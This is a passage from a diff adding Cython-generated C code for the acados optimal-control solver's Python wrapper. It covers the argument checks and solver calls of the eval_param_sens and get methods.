__Pyx_DECREF_SET(__pyx_v_field, __pyx_t_1); + __pyx_t_1 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":218 + * + * # checks + * if not isinstance(index, int): # <<<<<<<<<<<<<< + * raise Exception('AcadosOcpSolverCython.eval_param_sens(): index must be Integer.') + * + */ + __pyx_t_5 = PyInt_Check(__pyx_v_index); + __pyx_t_6 = (!__pyx_t_5); + if (unlikely(__pyx_t_6)) { + + /* "acados_template/acados_ocp_solver_pyx.pyx":219 + * # checks + * if not isinstance(index, int): + * raise Exception('AcadosOcpSolverCython.eval_param_sens(): index must be Integer.') # <<<<<<<<<<<<<< + * + * cdef int nx = acados_solver_common.ocp_nlp_dims_get_from_attr(self.nlp_config, self.nlp_dims, self.nlp_out, 0, "x".encode('utf-8')) + */ + __pyx_t_1 = __Pyx_PyObject_Call(((PyObject *)(&((PyTypeObject*)PyExc_Exception)[0])), __pyx_tuple__13, NULL); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 219, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_Raise(__pyx_t_1, 0, 0, 0); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __PYX_ERR(0, 219, __pyx_L1_error) + + /* "acados_template/acados_ocp_solver_pyx.pyx":218 + * + * # checks + * if not isinstance(index, int): # <<<<<<<<<<<<<< + * raise Exception('AcadosOcpSolverCython.eval_param_sens(): index must be Integer.') + * + */ + } + + /* "acados_template/acados_ocp_solver_pyx.pyx":221 + * raise Exception('AcadosOcpSolverCython.eval_param_sens(): index must be Integer.') + * + * cdef int nx = acados_solver_common.ocp_nlp_dims_get_from_attr(self.nlp_config, self.nlp_dims, self.nlp_out, 0, "x".encode('utf-8')) # <<<<<<<<<<<<<< + * + * if index < 0 or index > nx: + */ + __pyx_t_7 = __Pyx_PyBytes_AsString(__pyx_n_b_x); if (unlikely((!__pyx_t_7) && PyErr_Occurred())) __PYX_ERR(0, 221, __pyx_L1_error) + __pyx_v_nx = ocp_nlp_dims_get_from_attr(__pyx_v_self->nlp_config, __pyx_v_self->nlp_dims, __pyx_v_self->nlp_out, 0, __pyx_t_7); + + /* "acados_template/acados_ocp_solver_pyx.pyx":223 + * cdef int nx = acados_solver_common.ocp_nlp_dims_get_from_attr(self.nlp_config, self.nlp_dims, self.nlp_out, 0, "x".encode('utf-8')) + * + * if index < 0 or index > nx: # <<<<<<<<<<<<<< + * raise Exception(f'AcadosOcpSolverCython.eval_param_sens(): index must be in [0, nx-1], got: {index}.') + * + */ + __pyx_t_1 = PyObject_RichCompare(__pyx_v_index, __pyx_int_0, Py_LT); __Pyx_XGOTREF(__pyx_t_1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 223, __pyx_L1_error) + __pyx_t_5 = __Pyx_PyObject_IsTrue(__pyx_t_1); if (unlikely((__pyx_t_5 < 0))) __PYX_ERR(0, 223, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + if (!__pyx_t_5) { + } else { + __pyx_t_6 = __pyx_t_5; + goto __pyx_L5_bool_binop_done; + } + __pyx_t_1 = __Pyx_PyInt_From_int(__pyx_v_nx); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 223, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_2 = PyObject_RichCompare(__pyx_v_index, __pyx_t_1, Py_GT); __Pyx_XGOTREF(__pyx_t_2); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 223, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_t_5 = __Pyx_PyObject_IsTrue(__pyx_t_2); if (unlikely((__pyx_t_5 < 0))) __PYX_ERR(0, 223, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __pyx_t_6 = __pyx_t_5; + __pyx_L5_bool_binop_done:; + if (unlikely(__pyx_t_6)) { + + /* "acados_template/acados_ocp_solver_pyx.pyx":224 + * + * if index < 0 or index > nx: + * raise Exception(f'AcadosOcpSolverCython.eval_param_sens(): index must be in [0, nx-1], got: {index}.') # <<<<<<<<<<<<<< + * + * # actual eval_param + */ + __pyx_t_2 = PyTuple_New(3); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 224, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_8 = 0; + __pyx_t_9 = 127; + __Pyx_INCREF(__pyx_kp_u_AcadosOcpSolverCython_eval_param_2); + __pyx_t_8 += 74; + __Pyx_GIVEREF(__pyx_kp_u_AcadosOcpSolverCython_eval_param_2); + PyTuple_SET_ITEM(__pyx_t_2, 0, __pyx_kp_u_AcadosOcpSolverCython_eval_param_2); + __pyx_t_1 = __Pyx_PyObject_FormatSimple(__pyx_v_index, __pyx_empty_unicode); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 224, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_9 = (__Pyx_PyUnicode_MAX_CHAR_VALUE(__pyx_t_1) > __pyx_t_9) ? __Pyx_PyUnicode_MAX_CHAR_VALUE(__pyx_t_1) : __pyx_t_9; + __pyx_t_8 += __Pyx_PyUnicode_GET_LENGTH(__pyx_t_1); + __Pyx_GIVEREF(__pyx_t_1); + PyTuple_SET_ITEM(__pyx_t_2, 1, __pyx_t_1); + __pyx_t_1 = 0; + __Pyx_INCREF(__pyx_kp_u__2); + __pyx_t_8 += 1; + __Pyx_GIVEREF(__pyx_kp_u__2); + PyTuple_SET_ITEM(__pyx_t_2, 2, __pyx_kp_u__2); + __pyx_t_1 = __Pyx_PyUnicode_Join(__pyx_t_2, 3, __pyx_t_8, __pyx_t_9); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 224, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __pyx_t_2 = __Pyx_PyObject_CallOneArg(((PyObject *)(&((PyTypeObject*)PyExc_Exception)[0])), __pyx_t_1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 224, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __Pyx_Raise(__pyx_t_2, 0, 0, 0); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __PYX_ERR(0, 224, __pyx_L1_error) + + /* "acados_template/acados_ocp_solver_pyx.pyx":223 + * cdef int nx = acados_solver_common.ocp_nlp_dims_get_from_attr(self.nlp_config, self.nlp_dims, self.nlp_out, 0, "x".encode('utf-8')) + * + * if index < 0 or index > nx: # <<<<<<<<<<<<<< + * raise Exception(f'AcadosOcpSolverCython.eval_param_sens(): index must be in [0, nx-1], got: {index}.') + * + */ + } + + /* "acados_template/acados_ocp_solver_pyx.pyx":227 + * + * # actual eval_param + * acados_solver_common.ocp_nlp_eval_param_sens(self.nlp_solver, field, stage, index, self.sens_out) # <<<<<<<<<<<<<< + * + * return + */ + __pyx_t_10 = __Pyx_PyObject_AsWritableString(__pyx_v_field); if (unlikely((!__pyx_t_10) && PyErr_Occurred())) __PYX_ERR(0, 227, __pyx_L1_error) + __pyx_t_4 = __Pyx_PyInt_As_int(__pyx_v_stage); if (unlikely((__pyx_t_4 == (int)-1) && PyErr_Occurred())) __PYX_ERR(0, 227, __pyx_L1_error) + __pyx_t_11 = __Pyx_PyInt_As_int(__pyx_v_index); if (unlikely((__pyx_t_11 == (int)-1) && PyErr_Occurred())) __PYX_ERR(0, 227, __pyx_L1_error) + ocp_nlp_eval_param_sens(__pyx_v_self->nlp_solver, __pyx_t_10, __pyx_t_4, __pyx_t_11, __pyx_v_self->sens_out); + + /* "acados_template/acados_ocp_solver_pyx.pyx":229 + * acados_solver_common.ocp_nlp_eval_param_sens(self.nlp_solver, field, stage, index, self.sens_out) + * + * return # <<<<<<<<<<<<<< + * + * + */ + __Pyx_XDECREF(__pyx_r); + __pyx_r = Py_None; __Pyx_INCREF(Py_None); + goto __pyx_L0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":207 + * + * + * def eval_param_sens(self, index, stage=0, field="ex"): # <<<<<<<<<<<<<< + * """ + * Calculate the sensitivity of the curent solution with respect to the initial state component of index + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_2); + __Pyx_XDECREF(__pyx_t_3); + __Pyx_AddTraceback("acados_template.acados_ocp_solver_pyx.AcadosOcpSolverCython.eval_param_sens", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XDECREF(__pyx_v_field_); + __Pyx_XDECREF(__pyx_v_field); + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "acados_template/acados_ocp_solver_pyx.pyx":232 + * + * + * def get(self, int stage, str field_): # <<<<<<<<<<<<<< + * """ + * Get the last solution of the solver: + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_15get(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +PyDoc_STRVAR(__pyx_doc_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_14get, "\n Get the last solution of the solver:\n\n :param stage: integer corresponding to shooting node\n :param field: string in ['x', 'u', 'z', 'pi', 'lam', 't', 'sl', 'su',]\n\n .. note:: regarding lam, t: \n\n the inequalities are internally organized in the following order: \n\n [ lbu lbx lg lh lphi ubu ubx ug uh uphi; \n\n lsbu lsbx lsg lsh lsphi usbu usbx usg ush usphi]\n\n .. note:: pi: multipliers for dynamics equality constraints \n\n lam: multipliers for inequalities \n\n t: slack variables corresponding to evaluation of all inequalities (at the solution) \n\n sl: slack variables of soft lower inequality constraints \n\n su: slack variables of soft upper inequality constraints \n\n "); +static PyMethodDef __pyx_mdef_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_15get = {"get", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_15get, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_14get}; +static PyObject *__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_15get(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + int __pyx_v_stage; + PyObject *__pyx_v_field_ = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("get (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_stage,&__pyx_n_s_field_2,0}; + PyObject* values[2] = {0,0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); + CYTHON_FALLTHROUGH; + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_stage)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 232, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + CYTHON_FALLTHROUGH; + case 1: + if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_field_2)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 232, __pyx_L3_error) + else { + __Pyx_RaiseArgtupleInvalid("get", 1, 2, 2, 1); __PYX_ERR(0, 232, __pyx_L3_error) + } + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "get") < 0)) __PYX_ERR(0, 232, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 2)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); + } + __pyx_v_stage = __Pyx_PyInt_As_int(values[0]); if (unlikely((__pyx_v_stage == (int)-1) && PyErr_Occurred())) __PYX_ERR(0, 232, __pyx_L3_error) + __pyx_v_field_ = ((PyObject*)values[1]); + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("get", 1, 2, 2, __pyx_nargs); __PYX_ERR(0, 232, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("acados_template.acados_ocp_solver_pyx.AcadosOcpSolverCython.get", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + if (unlikely(!__Pyx_ArgTypeTest(((PyObject *)__pyx_v_field_), (&PyUnicode_Type), 1, "field_", 1))) __PYX_ERR(0, 232, __pyx_L1_error) + __pyx_r = __pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_14get(((struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *)__pyx_v_self), __pyx_v_stage, __pyx_v_field_); + + /* function exit code */ + goto __pyx_L0; + __pyx_L1_error:; + __pyx_r = NULL; + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_14get(struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *__pyx_v_self, int __pyx_v_stage, PyObject *__pyx_v_field_) { + PyObject *__pyx_v_out_fields = NULL; + PyObject *__pyx_v_field = NULL; + int __pyx_v_dims; + PyArrayObject *__pyx_v_out = 0; + __Pyx_LocalBuf_ND __pyx_pybuffernd_out; + __Pyx_Buffer __pyx_pybuffer_out; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_t_2; + PyObject *__pyx_t_3 = NULL; + PyObject *__pyx_t_4 = NULL; + int __pyx_t_5; + int __pyx_t_6; + PyObject *__pyx_t_7 = NULL; + char const *__pyx_t_8; + PyArrayObject *__pyx_t_9 = NULL; + char const *__pyx_t_10; + char *__pyx_t_11; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("get", 0); + __pyx_pybuffer_out.pybuffer.buf = NULL; + __pyx_pybuffer_out.refcount = 0; + __pyx_pybuffernd_out.data = NULL; + __pyx_pybuffernd_out.rcbuffer = &__pyx_pybuffer_out; + + /* "acados_template/acados_ocp_solver_pyx.pyx":251 + * """ + * + * out_fields = ['x', 'u', 'z', 'pi', 'lam', 't', 'sl', 'su'] # <<<<<<<<<<<<<< + * field = field_.encode('utf-8') + * + */ + __pyx_t_1 = PyList_New(8); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 251, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_INCREF(__pyx_n_u_x); + __Pyx_GIVEREF(__pyx_n_u_x); + PyList_SET_ITEM(__pyx_t_1, 0, __pyx_n_u_x); + __Pyx_INCREF(__pyx_n_u_u); + __Pyx_GIVEREF(__pyx_n_u_u); + PyList_SET_ITEM(__pyx_t_1, 1, __pyx_n_u_u); + __Pyx_INCREF(__pyx_n_u_z); + __Pyx_GIVEREF(__pyx_n_u_z); + PyList_SET_ITEM(__pyx_t_1, 2, __pyx_n_u_z); + __Pyx_INCREF(__pyx_n_u_pi); + __Pyx_GIVEREF(__pyx_n_u_pi); + PyList_SET_ITEM(__pyx_t_1, 3, __pyx_n_u_pi); + __Pyx_INCREF(__pyx_n_u_lam); + __Pyx_GIVEREF(__pyx_n_u_lam); + PyList_SET_ITEM(__pyx_t_1, 4, __pyx_n_u_lam); + __Pyx_INCREF(__pyx_n_u_t); + __Pyx_GIVEREF(__pyx_n_u_t); + PyList_SET_ITEM(__pyx_t_1, 5, __pyx_n_u_t); + __Pyx_INCREF(__pyx_n_u_sl); + __Pyx_GIVEREF(__pyx_n_u_sl); + PyList_SET_ITEM(__pyx_t_1, 6, __pyx_n_u_sl); + __Pyx_INCREF(__pyx_n_u_su); + __Pyx_GIVEREF(__pyx_n_u_su); + PyList_SET_ITEM(__pyx_t_1, 7, __pyx_n_u_su); + __pyx_v_out_fields = ((PyObject*)__pyx_t_1); + __pyx_t_1 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":252 + * + * out_fields = ['x', 'u', 'z', 'pi', 'lam', 't', 'sl', 'su'] + * field = field_.encode('utf-8') # <<<<<<<<<<<<<< + * + * if field_ not in out_fields: + */ + if (unlikely(__pyx_v_field_ == Py_None)) { + PyErr_Format(PyExc_AttributeError, "'NoneType' object has no attribute '%.30s'", "encode"); + __PYX_ERR(0, 252, __pyx_L1_error) + } + __pyx_t_1 = PyUnicode_AsUTF8String(__pyx_v_field_); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 252, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_v_field = __pyx_t_1; + __pyx_t_1 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":254 + * field = field_.encode('utf-8') + * + * if field_ not in out_fields: # <<<<<<<<<<<<<< + * raise Exception('AcadosOcpSolverCython.get(): {} is an invalid argument.\ + * \n Possible values are {}. Exiting.'.format(field_, out_fields)) + */ + __pyx_t_2 = (__Pyx_PySequence_ContainsTF(__pyx_v_field_, __pyx_v_out_fields, Py_NE)); if (unlikely((__pyx_t_2 < 0))) __PYX_ERR(0, 254, __pyx_L1_error) + if (unlikely(__pyx_t_2)) { + + /* "acados_template/acados_ocp_solver_pyx.pyx":256 + * if field_ not in out_fields: + * raise Exception('AcadosOcpSolverCython.get(): {} is an invalid argument.\ + * \n Possible values are {}. Exiting.'.format(field_, out_fields)) # <<<<<<<<<<<<<< + * + * if stage < 0 or stage > self.N: + */ + __pyx_t_3 = __Pyx_PyObject_GetAttrStr(__pyx_kp_u_AcadosOcpSolverCython_get_is_an, __pyx_n_s_format); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 256, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_4 = NULL; + __pyx_t_5 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_3))) { + __pyx_t_4 = PyMethod_GET_SELF(__pyx_t_3); + if (likely(__pyx_t_4)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_3); + __Pyx_INCREF(__pyx_t_4); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_3, function); + __pyx_t_5 = 1; + } + } + { + PyObject *__pyx_callargs[3] = {__pyx_t_4, __pyx_v_field_, __pyx_v_out_fields}; + __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_3, __pyx_callargs+1-__pyx_t_5, 2+__pyx_t_5); + __Pyx_XDECREF(__pyx_t_4); __pyx_t_4 = 0; + if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 256, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + } + + /* "acados_template/acados_ocp_solver_pyx.pyx":255 + * + * if field_ not in out_fields: + * raise Exception('AcadosOcpSolverCython.get(): {} is an invalid argument.\ # <<<<<<<<<<<<<< + * \n Possible values are {}. Exiting.'.format(field_, out_fields)) + * + */ + __pyx_t_3 = __Pyx_PyObject_CallOneArg(((PyObject *)(&((PyTypeObject*)PyExc_Exception)[0])), __pyx_t_1); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 255, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __Pyx_Raise(__pyx_t_3, 0, 0, 0); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __PYX_ERR(0, 255, __pyx_L1_error) + + /* "acados_template/acados_ocp_solver_pyx.pyx":254 + * field = field_.encode('utf-8') + * + * if field_ not in out_fields: # <<<<<<<<<<<<<< + * raise Exception('AcadosOcpSolverCython.get(): {} is an invalid argument.\ + * \n Possible values are {}. Exiting.'.format(field_, out_fields)) + */ + } + + /* "acados_template/acados_ocp_solver_pyx.pyx":258 + * \n Possible values are {}. Exiting.'.format(field_, out_fields)) + * + * if stage < 0 or stage > self.N: # <<<<<<<<<<<<<< + * raise Exception('AcadosOcpSolverCython.get(): stage index must be in [0, N], got: {}.'.format(self.N)) + * + */ + __pyx_t_6 = (__pyx_v_stage < 0); + if (!__pyx_t_6) { + } else { + __pyx_t_2 = __pyx_t_6; + goto __pyx_L5_bool_binop_done; + } + __pyx_t_6 = (__pyx_v_stage > __pyx_v_self->N); + __pyx_t_2 = __pyx_t_6; + __pyx_L5_bool_binop_done:; + if (unlikely(__pyx_t_2)) { + + /* "acados_template/acados_ocp_solver_pyx.pyx":259 + * + * if stage < 0 or stage > self.N: + * raise Exception('AcadosOcpSolverCython.get(): stage index must be in [0, N], got: {}.'.format(self.N)) # <<<<<<<<<<<<<< + * + * if stage == self.N and field_ == 'pi': + */ + __pyx_t_1 = __Pyx_PyObject_GetAttrStr(__pyx_kp_u_AcadosOcpSolverCython_get_stage, __pyx_n_s_format); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 259, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_4 = __Pyx_PyInt_From_int(__pyx_v_self->N); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 259, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_t_7 = NULL; + __pyx_t_5 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_1))) { + __pyx_t_7 = PyMethod_GET_SELF(__pyx_t_1); + if (likely(__pyx_t_7)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_1); + __Pyx_INCREF(__pyx_t_7); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_1, function); + __pyx_t_5 = 1; + } + } + { + PyObject *__pyx_callargs[2] = {__pyx_t_7, __pyx_t_4}; + __pyx_t_3 = __Pyx_PyObject_FastCall(__pyx_t_1, __pyx_callargs+1-__pyx_t_5, 1+__pyx_t_5); + __Pyx_XDECREF(__pyx_t_7); __pyx_t_7 = 0; + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 259, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + } + __pyx_t_1 = __Pyx_PyObject_CallOneArg(((PyObject *)(&((PyTypeObject*)PyExc_Exception)[0])), __pyx_t_3); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 259, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __Pyx_Raise(__pyx_t_1, 0, 0, 0); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __PYX_ERR(0, 259, __pyx_L1_error) + + /* "acados_template/acados_ocp_solver_pyx.pyx":258 + * \n Possible values are {}. Exiting.'.format(field_, out_fields)) + * + * if stage < 0 or stage > self.N: # <<<<<<<<<<<<<< + * raise Exception('AcadosOcpSolverCython.get(): stage index must be in [0, N], got: {}.'.format(self.N)) + * + */ + } + + /* "acados_template/acados_ocp_solver_pyx.pyx":261 + * raise Exception('AcadosOcpSolverCython.get(): stage index must be in [0, N], got: {}.'.format(self.N)) + * + * if stage == self.N and field_ == 'pi': # <<<<<<<<<<<<<< + * raise Exception('AcadosOcpSolverCython.get(): field {} does not exist at final stage {}.'\ + * .format(field_, stage)) + */ + __pyx_t_6 = (__pyx_v_stage == __pyx_v_self->N); + if (__pyx_t_6) { + } else { + __pyx_t_2 = __pyx_t_6; + goto __pyx_L8_bool_binop_done; + } + __pyx_t_6 = (__Pyx_PyUnicode_Equals(__pyx_v_field_, __pyx_n_u_pi, Py_EQ)); if (unlikely((__pyx_t_6 < 0))) __PYX_ERR(0, 261, __pyx_L1_error) + __pyx_t_2 = __pyx_t_6; + __pyx_L8_bool_binop_done:; + if (unlikely(__pyx_t_2)) { + + /* "acados_template/acados_ocp_solver_pyx.pyx":263 + * if stage == self.N and field_ == 'pi': + * raise Exception('AcadosOcpSolverCython.get(): field {} does not exist at final stage {}.'\ + * .format(field_, stage)) # <<<<<<<<<<<<<< + * + * cdef int dims = acados_solver_common.ocp_nlp_dims_get_from_attr(self.nlp_config, + */ + __pyx_t_3 = __Pyx_PyObject_GetAttrStr(__pyx_kp_u_AcadosOcpSolverCython_get_field, __pyx_n_s_format); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 263, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_4 = __Pyx_PyInt_From_int(__pyx_v_stage); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 263, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_t_7 = NULL; + __pyx_t_5 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_3))) { + __pyx_t_7 = PyMethod_GET_SELF(__pyx_t_3); + if (likely(__pyx_t_7)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_3); + __Pyx_INCREF(__pyx_t_7); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_3, function); + __pyx_t_5 = 1; + } + } + { + PyObject *__pyx_callargs[3] = {__pyx_t_7, __pyx_v_field_, __pyx_t_4}; + __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_3, __pyx_callargs+1-__pyx_t_5, 2+__pyx_t_5); + __Pyx_XDECREF(__pyx_t_7); __pyx_t_7 = 0; + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 263, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + } + + /* "acados_template/acados_ocp_solver_pyx.pyx":262 + * + * if stage == self.N and field_ == 'pi': + * raise Exception('AcadosOcpSolverCython.get(): field {} does not exist at final stage {}.'\ # <<<<<<<<<<<<<< + * .format(field_, stage)) + * + */ + __pyx_t_3 = __Pyx_PyObject_CallOneArg(((PyObject *)(&((PyTypeObject*)PyExc_Exception)[0])), __pyx_t_1); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 262, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __Pyx_Raise(__pyx_t_3, 0, 0, 0); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __PYX_ERR(0, 262, __pyx_L1_error) + + /* "acados_template/acados_ocp_solver_pyx.pyx":261 + * raise Exception('AcadosOcpSolverCython.get(): stage index must be in [0, N], got: {}.'.format(self.N)) + * + * if stage == self.N and field_ == 'pi': # <<<<<<<<<<<<<< + * raise Exception('AcadosOcpSolverCython.get(): field {} does not exist at final stage {}.'\ + * .format(field_, stage)) + */ + } + + /* "acados_template/acados_ocp_solver_pyx.pyx":266 + * + * cdef int dims = acados_solver_common.ocp_nlp_dims_get_from_attr(self.nlp_config, + * self.nlp_dims, self.nlp_out, stage, field) # <<<<<<<<<<<<<< + * + * cdef cnp.ndarray[cnp.float64_t, ndim=1] out = np.zeros((dims,)) + */ + __pyx_t_8 = __Pyx_PyObject_AsString(__pyx_v_field); if (unlikely((!__pyx_t_8) && PyErr_Occurred())) __PYX_ERR(0, 266, __pyx_L1_error) + + /* "acados_template/acados_ocp_solver_pyx.pyx":265 + * .format(field_, stage)) + * + * cdef int dims = acados_solver_common.ocp_nlp_dims_get_from_attr(self.nlp_config, # <<<<<<<<<<<<<< + * self.nlp_dims, self.nlp_out, stage, field) + * + */ + __pyx_v_dims = ocp_nlp_dims_get_from_attr(__pyx_v_self->nlp_config, __pyx_v_self->nlp_dims, __pyx_v_self->nlp_out, __pyx_v_stage, __pyx_t_8); + + /* "acados_template/acados_ocp_solver_pyx.pyx":268 + * self.nlp_dims, self.nlp_out, stage, field) + * + * cdef cnp.ndarray[cnp.float64_t, ndim=1] out = np.zeros((dims,)) # <<<<<<<<<<<<<< + * acados_solver_common.ocp_nlp_out_get(self.nlp_config, \ + * self.nlp_dims, self.nlp_out, stage, field, out.data) + */ + __Pyx_GetModuleGlobalName(__pyx_t_1, __pyx_n_s_np); if 